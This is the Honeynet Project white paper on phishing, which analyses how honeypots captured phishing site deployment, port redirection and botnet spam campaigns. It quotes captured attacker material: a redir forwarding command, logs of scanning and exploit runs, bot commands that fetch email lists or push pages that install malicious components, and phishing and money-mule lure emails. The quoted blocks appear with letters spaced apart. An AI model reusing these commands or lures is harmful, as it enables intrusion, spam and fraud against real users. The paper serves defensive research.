You are on page 1of 40

Know your Enemy: Phishing

Behind the Scenes of Phishing Attacks Primary Authors David Watson: david@honeynet.org.uk Thorsten Holz: thorsten.holz@gmail.com Sven Mueller: sven.mueller@smu-net.de Last Modified: 16th May 2005 Phishing is the practice of sending out fake emails, or spam, written to appear as if they have been sent by banks or other reputable organisations, with the intent of luring the recipient into revealing sensitive information such as usernames, passwords, account IDs, ATM PINs or credit card details. Typically, phishing attacks will direct the recipient to a web page designed to mimic a target organisation's own visual identity and to harvest the user's personal information, often leaving the victim unaware of the attack. Obtaining this type of personal data is attractive to blackhats because it allows an attacker to impersonate their victims and make fraudulent financial transactions. Victims often suffer significant financial losses or have their entire identity stolen, usually for criminal purposes. This KYE white paper aims to provide practical information on the practice of phishing and draws on data collected by the German Honeynet Project and UK Honeynet Project. This paper focuses on real world incidents that the Honeynet Project has observed in the wild, but does not cover all possible phishing methods or techniques. Attackers are constantly innovating and advancing, and there are likely to be new phishing techniques already under development or in use today. After a brief introduction and background, we will review the actual techniques and tools used by phishers, providing three examples of empirical research where real-world phishing attacks were captured using honeynets. These incidents will be described in detail and include system intrusion, phishing web site preparation, message propagation and data collection. Common techniques and trends are then analysed, including the growing integration of phishing, spamming, and botnets. Examples of the malware used by phishers to automate harvesting of email addresses and sending of spam email are reviewed, and we also present our observations on network scanning techniques and how compromised machines are used to spread phishing emails and other spam. Finally, we conclude this paper with an overview of the lessons learned in the last six months and suggest further research topics. This white paper includes extensive amounts of supporting information, with many hyperlinks to more detailed data on specific attacks available inline. Lastly, no confidential personal data was collected in the process of this research. In some cases, organizations involved in phishing attacks were contacted directly, or the incident data was forward to local CERTs.

Introduction
Tricking others into giving out passwords or other sensitive information has a long tradition in the attacker community. Traditionally this activity has been performed through the process of social engineering. In the 1990s, with the increasing growth in interconnected systems and the popularity of the Internet, attackers started to automate this process and attack the mass consumer market. The first systematic research to cover such activity was published in 1998 by Gordon and Chess (Sarah Gordon, David M. Chess: Where There's Smoke, There's Mirrors: The Truth about Trojan Horses on the Internet, presented at the Virus Bulletin Conference in Munich, Germany, October 1998). Gordon and Chess were researching malware on AOL, but they were faced with phishing attempts instead of the expected trojan horse attacks. The term phishing ("password harvesting fishing") describes the fraudulent acquisition, through deception, of sensitive personal information such as passwords and credit card details by masquerading as someone trustworthy with a real need for such information. A phishing message described by Gordon and Chess is shown below:
S e c t o r4 G 9 Eo fo u rd a t ab a s eh a sl o s ta l lI / Of u n c t i o n s .W h e ny o u ra c c o u n t l o g g e do n t oo u rs y s t e m ,w ew e r et e m p o r a r i l ya b l et ov e r i f yi ta sa r e g i s t e r e du s e r .A p p r o x i m a t e l y9 4s e c o n d sa g o ,y o u rv e r i f i c a t i o nw a sm a d e v o i db yl o s so fd a t ai nt h eS e c t o r4 G 9 E .N o w ,d u et oA O Lv e r i f i c a t i o n p r o t o c o l ,i ti sm a n d a t o r yf o ru st or e v e r i f yy o u .P l e a s ec l i c k' R e s p o n d 'a n d r e s t a t ey o u rp a s s w o r d .F a i l u r et oc o m p l yw i l lr e s u l ti ni m m e d i a t ea c c o u n t d e l e t i o n .

Early phishing attacks were primarily aimed at gaining access to the victim's AOL accounts, or occasionally at obtaining credit card data for fraudulent purposes (e.g. to make illegal purchases with this information). Often the phishing messages contained a simple ruse to trick unskilled computer users and relied heavily upon the victim’s innate sense of trust in "automated" system functions or (apparent) figures of authority. As demonstrated in the previous example, this could be a story about a broken hardware device or the failure of a database, and most normal system users would take at face value any reasonably official-looking or highly urgent technical request that appeared to offer them assistance. Users were usually prompted to enter sensitive information quickly to avoid a serious problem, for example via the phrase "[...] and re-state your password. Failure to comply will result in immediate account deletion". To avoid potentially dire consequences the victims often complied immediately, unknowingly providing the social engineer with the credentials they required. Anecdotal evidence suggested that the culprits usually were acting alone or in small, unsophisticated groups. Literature often portrays early phishers as adolescents desiring account data for causing mischief and to make long distance phone calls, usually with little high level organisation or malice. Today, the preferred strategy chosen by phishers is to bulk email their lures to as many end users as possible whilst masquerading as a trusted brand - usually one with whom the phisher hopes there is a chance that the victim already trusts. A request for urgent action is sent, often ironically to protect the user's confidential data from malicious activities, and this spoof email will contain an obscured link to a remote web-page that masquerades as the public web site of the target brand. The phisher hopes that victims will be tricked into submitting their credentials into a fake, but apparently legitimate looking "official" web interface for the trusted brand. Examples of the organisations being targeted by phishers include many well-known banks, credit card companies or well known Internet traders requiring regular payments (e.g. eBay and PayPal). Numerous examples of phishing emails targeting customers can be found at the Anti-Phishing Working Group web site, which has a archive of phishing emails, many of which illustrate the high degree of accuracy with which phishers can trick innocent users into believing they are accessing a legitimate web interface. Following this brief introduction to the concepts of phishing, we will now review the actual techniques and tools we have captured during phishing attacks observed in the wild. If you are interested in further background on phishing, we have prepared this page of detailed background information.

Tools and Tactics
Phishing attacks generally rely on a number of simple tools and techniques to trick unsuspecting users. The underlying infrastructure to support a phishing scam may be as basic as a simple copied HTML page uploaded to a freshly compromised web server and a server side script to process any user input data, or it may involve more complex web sites and content redirection, but generally the objectives are the same - to set up a fake web presence for a trusted brand with the necessary back end capabilities to process user input data and make it available to the attacker. Using modern HTML editing tools it is very easy to produce a web site mimicking a target organisation, and poorly secured web servers can easily be located and compromised if an attacker is not adverse to scanning entire portions of Internet IP address space in the search for vulnerable target hosts. Once compromised, even home PCs can make effective hosts for phishing web sites, so not only well known corporate or academic systems are targeted. Attackers are often indiscriminate in their choice of target computers, purely selecting large IP address blocks to scan at random for a particular exploitable security vulnerability. Once a phisher has established a realistic and convincing fake web site that mimics a trusted brand, their main challenge is how to divert users of a legitimate web site to the fake web site instead. Unless the phisher has the ability to alter the DNS for a target web site (DNS poisoning) or somehow otherwise redirect network traffic (a technique sometimes referred to as pharming), they must instead rely on some form of content level trickery to lure unfortunate users to the fake web site. The better the quality of the lure, and the wider the net that can be thrown, the greater the chance of an innocent user mistakenly accessing the fake web site (and in the process potentially providing the phisher with the victim's credentials or other personal data).

Unfortunately for the attacker, when they target an individual organisation (such as a bank or trusted retailer), the phisher probably does not have any information about who on the Internet is a customer of the target organisation and therefore who might be most receptive to a particular lure. Although the attacker could post hyperlinks pointing to the fake web site on chat rooms and forums related to the target brand (such as a technical support web site or community discussion group), it is likely that the target organisation would be notified reasonably quickly and the offending hyperlinks removed or discredited before many victims had accessed the content and submitted their personal details. There would also be a significant risk that the target organisation or law enforcement agencies might trace and potentially shut down the fake web site. The phisher therefore requires a method of reaching the maximum number of potential victims with the minimum amount of risk, and they have found their ideal partner in crime in the form of spam email. Spammers have databases containing many millions of active email addresses, so the latest mass emailing techniques can be employed to allow a phisher to distribute their lure to a very wide audience with very low risk. Spam emails are often sent via compromised servers hosted in foreign countries, or via global networks of zombie PCs (botnets), so the likelihood of an individual sender being traced is low. If an unsuspecting user receives an officially branded email that appears to have been sent by their bank which asks them to go to what appears to be the bank's usual branded web site to change their online banking password for security reasons, they are much more likely to consider doing so than when confronted with standard spam emails about novelty products and links to unknown web sites. To increase the likelihood that a user will believe that an email is genuine, the phisher can employ a number of techniques to further improve the quality of their attempted deception: Using IP addresses instead of domain names in hyperlinks that address the fake web site. Many innocent users will not check (or know how to check) that an IP address is registered and assigned to the target organisation that the branded fake web site claims to represent. Registering similar sounding DNS domains and setting up fake web sites that closely mimic the domain name of the target web site (i.e. b1gbank.com or bigbnk.com instead of bigbank.com), in the hope that users will mistake the fake domain name for the real domain name. Embedding hyperlinks from the real target web site into the HTML contents of an email about the fake phishing web site, so that the user's web browser makes most of the HTTP connections to the real web server and only a small number of connections to the fake web server. If the user's email client software supports auto-rendering of the content, their client may attempt to connect automatically to the fake web server as soon as the email is read, and manual browsers may not notice the small number of connections to a malicious server amongst the normal network activity to the real web site. Encoding or obfuscating the fake web site URL. Depending on the method employed, many users will not notice or understand what has been done to a hyperlink and may assume it is benign. One variant of this technique (IDN spoofing) is to use Unicode URLs that render in browsers in a way that looks like the original web site address but actually link to a fake web site with a different address. Attempting to exploit weaknesses in the user's web browser to mask the true nature of the message content. Microsoft's Internet Explorer and Outlook applications have been particularly vulnerable to such techniques (such as the address bar spoofing or IFrame element bugs). Configuring the fake phishing web site to record any input data that the user submits (such as usernames and passwords), silently log them and then forward the user to the real web site. This might cause a "password incorrect, please retry" error or even be totally transparent, but in either situation many users will not be overly worried and put this event down to their own poor typing, rather than intervention by a malicious third party. Set up a fake web site to act as a proxy for the real web site of the target brand, covertly logging credentials that are not encrypted using SSL (or even registering valid SSL certificates for spoof domains). Redirect victims to a phishing web site by first using malware to install a malicious Browser Helper Object on their local PC. BHOs are DLLs designed to customize and control the Internet Explorer web browser, and if successful, victims can be tricked into believing they are accessing legitimate content when in fact they are accessing a fake web site. Use malware to manipulate the hosts file on a victim's PC that is used to maintain local mappings between DNS names and IP addresses. By inserting a fake DNS entry into a user's hosts file, it will appear that their web browser is connecting to a legitimate web site when in fact it is connecting to a completely different web server hosting the fake phishing web site. Due to the relatively complex nature of many e-commerce or online banking applications, which often employ HTML frames and sub-frames or other complex page structures, it may be difficult for an end user to easily determine if a particular web page is legitimate or not. A combination of the techniques listed above may mask the true source of a rendered web page and an unsuspecting user might be tricked into mistakenly accessing the phisher's fake web site, unknowingly divulging their authentication credentials or other personal data. At this point the phisher will be free to make use of the user's accounts or electronic identity as required, and the user becomes another victim of a successful phishing attack.

Real World Phishing Techniques
Very often Internet users become aware of phishing attacks by receiving spoof emails themselves or viewing a recorded copy of a malicious web site below the headlines on a technology news site, long after the server temporarily hosting the phishing content has been taken down. These events tend to be viewed in isolation and purely from the perspective of the victim. One of the major benefits that honeynet technology can offer is the capability to capture all activity from the perspective of the attacker, allowing security analysts to build up a more complete understanding of the entire life span of a phishing attack. Members of the Honeynet Project's Research Alliance are fortunate enough to have captured a number of rich data sets that can help to illustrate the stages of such an attack, from initial compromise and phishing web site set up through to mass emailing and victim data capture. Three different examples of typical real world phishing techniques are presented and reviewed below.

Phishing Technique One - Phishing Through Compromised Web Servers
Most phishing attacks that we have observed in the wild involve attackers breaking in to vulnerable servers and installing malicious web content. Honeynet technology allows us to capture in detail the typical life cycle of a phishing attack, and in general terms the flow of events we have observed during such incidents are as follows: Attackers scan for vulnerable servers Server is compromised and a rootkit or password protected backdoor installed Phishers gain access to the server through this encrypted back door If the compromised server is a web server, pre-built phishing web sites are downloaded Some limited content configuration and web site testing is performed (potentially revealing the phisher's true IP address when they first access the web server) Mass emailing tools are downloaded and used to advertise the fake web site via spam email Web traffic begins to arrive at the phishing web site and potential victims access the malicious content Often the time taken for this incident life cycle is only a matter of hours or days from when the system is first connected to the Internet, and our research suggests that such activity is taking place on many servers and targeting many organisations at once. We will illustrate these theories using data recorded during two incidents that are typical of common phishing attacks, using one incident observed by the German Honeynet Project and one incident observed by the UK Honeynet Project. In each case, vulnerable Linux honeypots were deployed by Honeynet Research Alliance members. The subsequent compromise of both honeypots shared a similar modus operandi: the vulnerable honeypots were scanned and compromised in quick succession, with prebuilt phishing web sites and mass emailing tools for sending spam emails being uploaded and used by the attackers. Rootkits and IRC servers were also installed during these attacks, something we commonly observed in other similar incidents. The compromised honeypots were also used for several different purposes in addition to phishing: as an IRC bot by Romanian attackers and also as a scanner to locate and attack additional vulnerable computers (although the honeynet architecture prevented the attackers from successfully exploiting other servers from the compromised honeypots). Some interesting differences were also apparent, not least in the case of the UK incident, where several different groups accessed the compromised honeypot at the same time, making forensic analysis more complicated. For the sake of brevity, we have not included the details of these specific attacks in this paper and have only covered the lessons learned and how they apply to phishing. If you would like to review more details about the specific attacks, the following information is available: Overview of Honeynet configurations Details of German honeypot compromise Details of UK honeypot compromise (timeline) Details of UK honeypot compromise (content analysis)

The table below shows a summary of the key factors and differences between the incidents: Data Compromised honeypot Location Attack method Vulnerability exploited DE Incident Redhat Linux 7.1 x86. German corporate network. "Superwu" autorooter. Wu-Ftpd File globbing heap corruption vulnerability (CVE-2001-0550). Root. Simple rootkit that backdoors several binaries. Unknown. UK Incident Redhat Linux 7.3 x86. UK ISP data centre. "Mole" mass scanner. NETBIOS SMB trans2open buffer overflow (CAN2003-0201). Root. SHV4 rootkit. Multiple groups from cable modem IP ranges in Constanta region of Romania. Pre-built phishing web site downloaded targeting a major US bank. PHP script with more advanced user input validation and data categorisation. Only test emails sent, potentially to fellow phishers. Improved syntax and presentation. Basic PHP script from small input list of email addresses - possibly just a test. Yes. 265 HTTP requests in 4 days, not due to spam sent from this server (no customer details were compromised).

Level of access gained Rootkit installed Probable attackers

Web site activity

Multiple pre-built phishing web sites downloaded targeting eBay and major US banks. PHP script to validate user input.

Server side processing

Email activity

Tried to send spam (example 1, example 2), but blocked by Honeywall. Basic PHP script from medium sized input list of email addresses.

Mass emailing method

Victim traffic reached honeypot No, spam advertisement and access to phishing web site blocked.

From observing the phisher's keystrokes in both incidents (captured using Sebek), it is clear that the attackers connected to pre-existing back doors and immediately went to work deploying their phishing web sites. The attackers appeared to be familiar with the server environment, suggesting they were part of the group who originally compromised the honeypots, and that the phishing attempt was fairly well organised. As the uploaded web content often referred to other web servers and IP addresses, it is also likely that such activity was probably occurring on multiple servers at once. Analysis of the phishing web site content downloaded by attackers during these incidents makes it clear that phishers are simultaneously targeting many well known online brands. Well constructed and officially branded pre-built fake web sites are routinely being deployed onto compromised servers - often targeting multiple organisations via separate "micro sites", with separate web server document roots, along with the necessary tools to propagate spam emails to potential phishing victims. Directory listings observed during FTP sessions also confirm that the attackers were heavily involved in spam and phishing activities, revealing pre-built web content and message delivery tools stored on a central server and appearing to target at least eBay, AOL, and several well known US banks in the case of the UK incident. These individual phishing attacks are unlikely to be isolated events, as the spam emails sent during the incidents often directed victims to a different web server than the compromised honeypot. This indicates that phishers are running multiple fake web servers and sending spam from multiple systems at once. Parallel phishing operations are also indicated by the timing of the first inbound HTTP request for phishing content after the UK honeypot was compromised:
2 0 0 4 0 7 2 32 1 : 2 3 : 1 4 . 1 1 8 9 0 2X X X . X X X . X X X . X X X>1 0 . 2 . 2 . 1 2 0H T T PG E T/ . i n t e r n e t B a n k i n g L o g o nH T T P / 1 . 1

This inbound HTTP request to the honeypot occurred before the attackers had finished setting up the fake online banking content on the honeypot, and confirms the hypothesis that the attacker knew in advance that this server was available for use as a phishing web site. Spam messages advertising the new phishing web site were already being emailed to victims from another host, even whilst the attacker was setting up the new phishing web site. We were surprised by the number and range of source IP addresses making inbound HTTP requests to the compromised honeypot for the fake online banking content. The graph below shows the number of unique and repeat HTTP requests from individual IP addresses to the UK phishing web site before the honeypot was disconnected to protect end users (and the incident details logged with the targeted bank): [image:images/HTTP%20access.JPG size=full] A breakdown of the source top level DNS domains, countries and host operating systems accessing the phishing content on the UK honeypot can be found here. Note that before the honeypot was taken offline for forensic analysis, although web traffic for the phishing web site did arrive at the UK honeypot, no HTTP POST requests were made to the PHP script that processes users' data and therefore no user data was compromised during this phishing attack. In all the incidents discussed in this white paper, either the target organisation was notified of the incident and any relevant data was made available to them on request, or the local CERT was notified of any malicious activity. In all cases no compromised victim personal data was captured by Honeynet Project or Research Alliance members. Data from these two example incidents suggests that phishers are active and organised, moving quickly between compromised computer systems and simultaneously targeting multiple well known brands. It also appears that a number of email users are regularly being tricked into accessing fake web interfaces for organisations such as online banks or retailers, and risk becoming victim's of phishing attacks.

Phishing Technique Two - Phishing Through Port Redirection
In November 2004, the German Honeynet Project deployed a classic GenII honeynet with a Redhat Linux 7.3 honeypot. Although this is a relatively old operating system release and an easy target for attackers, it surprisingly took around 2.5 months before the honeypot was successfully compromised - a marked contrast with the relatively quick compromise of the honeypots

discussed in the incidents above. More information on this trend can be found in a previous KYE white paper "Know your Enemy: Trends". On January 11th 2005, an attacker did successfully compromise the honeypot, using an exploit for the OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability present in the default Redhat Linux 7.3 distribution. This incident was unusual in that once the attacker had gained access to the compromised system, no phishing content was uploaded directly. Instead, the attacker installed and configured a port redirection service on the honeypot. This port redirection service was designed to re-route HTTP requests sent to the honeypot web server to another remote web server in a transparent manner, potentially making the location of the content source harder to trace. The attacker downloaded and installed a tool called redir on the honeypot, which was a port redirector utility designed to transparently forward incoming TCP connections to a remote destination host. In this incident the attacker configured the tool to redirect all incoming traffic on TCP port 80 (HTTP) of the honeypot to TCP Port 80 (HTTP) on a remote web server in China. Interestingly, the attacker did not bother to install a rootkit to hide their presence on the honeypot, which suggests that the attacker did not value the compromised server too highly and that they were not particularly worried about being detected. The command used by the attacker to establish port redirection was:
r e d i rl p o r t = 8 0l a d d r = < I Pa d d r e s so fh o n e y p o t >c p o r t = 8 0c a d d r = 2 2 1 . 4 . X X X . X X X

In addition, the attacker modified the Linux system start up file /etc/rc.d/rc.local to ensure that the redir port redirector service would be restarted if the honeypot system was rebooted, improving the chance of survival for their port redirection service. They then began to send out spam phishing emails which advertised the honeypot, an example of which can be found here (note that relevant sensitive information has been obfuscated). To further investigate the activities for the phisher, members of the German Honeynet Project intervened and covertly modified the configuration of the attacker's redir tool installed on the honeypot, enabling logging within the redir application itself, to more easily observe how many people received a spam email advertising the honeypot and then clicked on a hyperlink to access the transparently redirected phishing content. Within a period of about 36 hours, 721 unique IP addresses were redirected, and once again we were surprised by how many users were apparently being tricked into accessing such content through phishing emails. An analysis of the IP addresses accessing the port redirector honeypot can be found here (note that this information has been sanitized to protect the users who accessed the phishing content, and again only IP data was logged during this research. No confidential user data was captured). A summary timeline of the incident is provided below: Date / Time 1st Nov 2004 11th Jan 2005 - 19:13 11th Jan 2005 - 20:07 13th Jan 2005 - 8:15 Event First network probe data of honeypot Honeypot OpenSSL service compromised, port redirector installed and phishing spam sent Web requests for phishing content begins to arrive at honeypot Honeypot taken offline for forensic analysis

Phishing Technique Three - Phishing Using Botnets
The recent white paper by the Honeynet Project called "KYE: Tracking Botnets" introduced a method to track botnets. A botnet is a network of compromised computers that can be remotely controlled by an attacker. Due to their immense size (tens of thousands of systems can be linked together), botnets can pose a severe threat to the community when used for Denial-of-Service (DoS) attacks. Initial research in this area demonstrated that botnets are sometimes used to send out spam emails and can also be used for phishing attacks. During a study in October 2004, email security company CipherTrust suggested that 70% of monitored phishing spam was sent through one of five active botnets, but our own observations suggest that many more botnets are in use for spam operations. Although not the analysis of one single incident, in this section we present our observations on the tools and techniques used by attackers engaged in phishing via botnets.

Incident Timeline
During the period between September 2004 and January 2005, the German Honeynet Project deployed a series of un-patched Microsoft Windows based honeypots to observe botnet activity. An automated process was developed to allow honeypots to be repeatedly deployed, compromised and shutdown for forensic analysis. During this period over 100 separate botnets were observed and thousands of files were captured for offline analysis.

Analysis
Some versions of bot software captured during this research project provided the capability to remotely start a SOCKS v4/v5 proxy on a compromised host. SOCKS provides a generic proxy mechanism for TCP/IP-based networking applications (RFC 1928) and can be used to proxy most popular Internet traffic, such as HTTP or SMTP email. If an attacker with access to a botnet enables the SOCKS proxy functionality on a remote bot, this machine can then be used to send bulk spam email. If the botnet contains many thousands of compromised hosts, an attacker is then able to send massive amounts of bulk email very easily, often from a wide range of IP addresses owned by unsuspecting home PC users. The lack of a central point of contact and the range of international boundaries crossed could make it very difficult to trace and stop such activity, making it of low risk, but potentially high reward to spammers and phishers. Perhaps unsurprisingly, resourceful botnet owners have begun to target criminal activity and it is now possible to rent a botnet. For a fee, the botnet operator will provide a customer with a list of SOCKS v4 capable server IP addresses and ports. There are documented cases where botnets were sold to spammers as spam-relays: "Uncovered: Trojans as Spam Robots". Some captured bot software also implemented a special function to harvest email-addresses or to send spam via bots. The following listing shows some of the commands related to sending spam/phishing emails implemented in Agobot, a popular bot used by attackers and a variant regularly captured during our research: harvest.emails - "makes the bot get a list of emails" harvest.emailshttp - "makes the bot get a list of emails via HTTP" spam.setlist - "downloads an email list" spam.settemplate - "downloads an email template" spam.start - "starts spamming" spam.stop - "stops spamming" aolspam.setlist - "AOL - downloads an email list" aolspam.settemplate - "AOL - downloads an email template" aolspam.setuser - "AOL - sets a username" aolspam.setpass - "AOL - sets a password" aolspam.start - "AOL - starts spamming"

aolspam.stop - "AOL - stops spamming" Further information about how these commands are implemented can be found here in a side note about the source code of bots. With the help of drone, a customised IRC client developed by the German Honeynet Project, we were able to learn more about how bots are used for spam/phishing email attacks by smuggling a fake client into a botnet using the connection data collected through the attacks against our honeynets. A number of typical examples of observed activity are shown below.

Example 1
Within one particular botnet we observed an attacker who issued the following command (please note that the URLs have been obfuscated):
< S t 0 n 3 y >. m mh t t p : / / w w w . e x a m p l e . c o m / e m a i l / f e t c h . p h p ? 4 a 0 0 5 a e c 5 d 7 d b e 3 b 0 1 c 7 5 a a b 2 b 1 c 9 9 9 1h t t p : / / w w w . f o o b a r . n e t / p a y . h t m lJ o ed i d _ u _ s e n d _ m e _ t h i s

The command .mm ("mass emailing") is a customized version of the generic spam.start command. This command accepts four parameters: 1. 2. 3. 4. A URL for a file that contains several email addresses. The web page to target within the spam email - this could be a normal spam web-page or a phishing web site. The name of the sender. The subject of the email.

In this case, the fetch.php script returned 30 different email addresses every time it was invoked. To each of these recipients, an email message was constructed that advertised the second parameter of the command. In this example, it pointed to a web-page which attempted to install an ActiveX component on the victim's computer.

Example 2
In another botnet we observed the installation of Browser Helper Objects on a victim's PC:
[ T O P I C ]# s p a m 9: . o p e nh t t p : / / a m a t e u r . e x a m p l e . c o m / l 3 3 t a g 3 / b e t a . h t m ls

The .open commands tells each bot to open the requested web-page and display it to the victim. In this case the web-page contained a Browser Helper Object (BHO) that would attempt to install itself on the victim's computer. As the channel name indicates, this botnet was also used for sending spam.

Example 3
In another botnet we observed examples of spyware propagation:
h t t p : / / p u b l i c . e x a m p l e . c o m / p r o m p t . p h p ? h = 6 d 7 9 9 f b e e f 3 a 9 b 3 8 6 5 8 7 f 5 f 7 b 3 7 f [ . . . ]

This link was found during analysis of captured malware. It directs the victim to the web-page of a company that offers "free ad delivery software which provides targeted advertising offers". This web site contains several pages that try to install ActiveX components on visiting clients, presumably adware or spyware.

Common Themes
A number of common themes were observed during our research into phishing attacks, and it is clear that attackers are employing a blend of tools and techniques to improve their chances of success. We will now briefly review two such techniques - mass scanning and combination attacks.

Mass Scanning
Analysis of a number of compromised honeypots suggests that the systems were being attacked using automated attack scripts or exploits, often known as autorooters. In both the incidents described in phishing technique one above, once the attackers had compromised the honeypots, autorooter toolkits were uploaded to the server. The attackers then attempted to scan large ranges of IP addresses for similarly vulnerable servers (using scanners called "superwu" in the German incident and "mole" in the UK incident). Captured attacker keystrokes from the UK incident are show below, showing examples of the types of mass scanning activity attempted from compromised honeypots. Note that due to the honeynet configuration, hostile outbound traffic was blocked and these attacks did not succeed. Attacker extracts scanner and attempts to scan class B network blocks:
[ 2 0 0 4 0 7 1 81 5 : 2 3 : 3 1b a s h0 ] t a rz x v fm o l e . t g z [ 2 0 0 4 0 7 1 81 5 : 2 3 : 3 3b a s h0 ] c dm o l e [ 2 0 0 4 0 7 1 81 5 : 2 3 : 3 8b a s h0 ] . / m a z z6 3 . 2 [ 2 0 0 4 0 7 1 81 5 : 2 4 : 0 4b a s h0 ] . / m a z z2 0 7 . 5 5 [ 2 0 0 4 0 7 1 81 5 : 2 5 : 1 3b a s h0 ] . / s c a n8 0 . 8 2

Attacker attempts to exploit potentially vulnerable servers:
[ 2 0 0 4 0 7 1 91 1 : 5 6 : 4 6b a s h0 ] c dm o l e [ 2 0 0 4 0 7 1 91 1 : 5 6 : 5 0b a s h0 ] . / r o o tb0vn s 1 . v i c t i m . n e t [ 2 0 0 4 0 7 1 91 1 : 5 7 : 2 6b a s h0 ] . / r o o tb0v6 6 . 9 0 . N N N . N N N

Attacker returns later to check list of successfully compromised servers (the list was empty, due to the honeynet configuration):
[ 2 0 0 4 0 7 2 30 8 : 1 3 : 1 8b a s h0 ] c dm o l e [ 2 0 0 4 0 7 2 30 8 : 1 3 : 2 0b a s h0 ] l s [ 2 0 0 4 0 7 2 30 8 : 1 3 : 2 5b a s h0 ] c a th a c k e d . s e r v e r s

Attacker attempts to scan multiple class B network blocks and then test an exploit against a selection of targets:
[ 2 0 0 4 0 7 2 41 0 : 2 4 : 1 7b a s h0 ] c dm o l e [ 2 0 0 4 0 7 2 41 0 : 2 4 : 1 9b a s h0 ] . / s c a n1 4 0 . 1 3 0 [ 2 0 0 4 0 7 2 41 0 : 2 4 : 2 7b a s h0 ] . / s c a n1 6 6 . 8 0 [ 2 0 0 4 0 7 2 41 0 : 2 5 : 3 6b a s h0 ] . / s c a n1 6 6 . 4 [ 2 0 0 4 0 7 2 41 0 : 2 6 : 2 3b a s h0 ] . / s c a n1 3 9 . 9 3 [ 2 0 0 4 0 7 2 41 0 : 2 7 : 1 8b a s h0 ] . / s c a n1 3 3 . 2 0 0 [ 2 0 0 4 0 7 2 41 0 : 3 6 : 3 7b a s h0 ] . / t r y2 0 2 . 9 8 . X X X . X X X [ 2 0 0 4 0 7 2 41 0 : 3 8 : 1 7b a s h0 ] . / t r y2 0 2 . 9 8 . Y Y Y . Y Y Y [ 2 0 0 4 0 7 2 41 0 : 3 8 : 2 7b a s h0 ] . / t r y2 0 2 . 9 8 . Y Y Y . Y Y Y

In the final example above, note that the hosts that the attacker attempts to compromise are not part of the IP address ranges scanned from this honeypot, which again provides evidence of well coordinated and parallel mass scanning activity. Further investigation of the mole.tgz file downloaded by UK attackers revealed a number of text files in the root directory of the unpacked autorooter toolkit. These files included scan configurations and logs of previous scanning activity for the "grabbb2.x and samba2.2.8 vulnerability". 42 cases of attacks against other hosts were present in these files, along with evidence of mass scanning of many class B network blocks, confirming that the observed incident was part of larger and more organised attack against similar systems. An example of the output from the mole scanning tool, viewed from an attacker's perspective, can be found here. Finally, some of the mass scanning tools recovered from compromised honeypots do not appear to be in popular circulation, which suggests that the attackers had some level of development and tool smith capabilities beyond basic script kiddy activity, or were part of a closed community that did not share their tools in public forums. Again, this suggests more organised attackers.

Combination Attacks
In our research, we also observed that phishers are frequently combining the three attacking techniques we have observed and documented in this white paper, sometimes combining multiple methods to provide redundancy and protect their phishing infrastructure through implementation of a two-stage networking configuration. The following diagram depicts a possible phishing network topology: [image:images/phishing-setup.png size=full] In this example a central web server hosts the physical phishing content, often serving more then one web site (e.g. an eBay phishing-site in /ebay and a PayPal phishing-site in /paypal). Several compromised remote computers redirect incoming HTTP traffic on TCP port 80 to the central web server with the help of the redir port redirector. This has several advantages from an attacker's point of view when compared to a single phishing web site: If the compromise of one of the remote redir hosts is detected, the victim will probably take the system offline and re-install it. This does not represent a major loss for the phisher because the main phishing web site is still online and several other redir hosts continue to deliver HTTP traffic to the central web server. If the compromise of the central phishing server is detected, this system will also be taken offline. Now the phisher can simply set up a new phishing site on a freshly compromised system and then re-adjust the existing network of redir hosts to redirect traffic to the replacement central host. Using this technique, the whole network can be made available very quickly and the phishing attacks can soon recommence. A redir host is very flexible, since it can be easily reconfigured to point to another phishing web site. This decreases the time between initial system compromise and phishing web site availability, and increases the length of the attack window in which the phishing attacks can be performed. The use of such techniques again suggests more organised and capable attackers, rather than the work of simple script kiddies. Similar operational models are often used by major web hosting companies and high volume content providers.

Further Observations - Fund Transfer
Our research has also shed light on how phishers use captured information about bank accounts, for example, an account number with associated TAN (transaction number used in electronic banking). Since foreign currency transfers are monitored by most banks, phishers cannot simply transfer large amounts of money from one country to another without alerting the financial authorities. Phishers therefore have to use intermediaries to transfer money for them - in a two stage process the phisher transfers money from the victim's bank account to a bank account of an intermediary in the same country. The intermediary then withdraws the money from their bank account (less a percentage remuneration for providing the service) and sends it to the phisher, for example by surface mail. Of course, the intermediary could be caught, but as the phisher's money is already in transit they do not face too much risk and can easily change to channel their funds through a replacement intermediary. An example email demonstrating some of the financial structures behind phishing attacks is show below:
H e l l o ! W ef i n d i n gE u r o p ep e r s o n s ,w h oc a nS e n d / R e c e i v eb a n kw i r e s f r o mo u rs e l l i n g s ,f r o mo u rE u r o p e a nc l i e n t s .T on o tp a y T A X E Sf r o mi n t e r n a t i o n a lt r a n s f e r si nR u s s i a .W eo f f e r1 0 % p e r c e n tf r o ma m o u n tur e c e i v ea n dp a ya l lf e e s ,f o rs e n d i n g f u n d sb a c k . A m o u n tf r o m1 0 0 0e u r op e rd a y .A l lt h i sa c t i v i t y a r el e g a li nE u r o p e . F i l lt h i sf o r m :h t t p : / / X X X . i n f o / i n d e x . p h p( b e f o r ef i l l i n g i n s t a l ly a h o o !m e s s e n g e rp l e a s eo rm s n ) ,y o uw i l lr e c i e v e f u l ld e t a i l sv e r yq u i c k l y . _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ W i r ,e u r o p ? i s c h eP e r s o n e nf i n d e n d ,d i eB a n k l e i t u n g e n d a v o nS e n d e n / e r h a l t e nk ? n n e nu n s e r eV e r k ? u f e ,v o n u n s e r e nK u n d e nv o nD e u t s c h l a n d .S T E U E R Nv o ni n t e r n a t i o n a l e n ? b e r t r a g u n g e ni nR u s s l a n dn i c h tz ub e z a h l e n .W i r e r h ? l td a sP r o z e n td e sA n g e b o t s1 0%v o mB e t r a gu n d b e z a h l ta l l eS c h u l g e l d e r ,u mK a p i t a lz u r ? c kz us e n d e n . B e t r a gv o n1 0 0 0E u r op r oT a g .D i e s eg a n z eT ? t i g k e i t i s ti nE u r o p ag e s e t z l i c h . F ? l l e nS i ed i e s eF o r m :h t t p : / / X X X . i n f o / i n d e x . p h p( b e v o r d i eF ? l l u n gY a h o oi n s t a l l i e r t !B o t eb i t t eo d e rm s n ) ,S i e r e c i e v ev o l l eD e t a i l ss e h r . T h a n ky o u ,F I N A N C I EL T D .

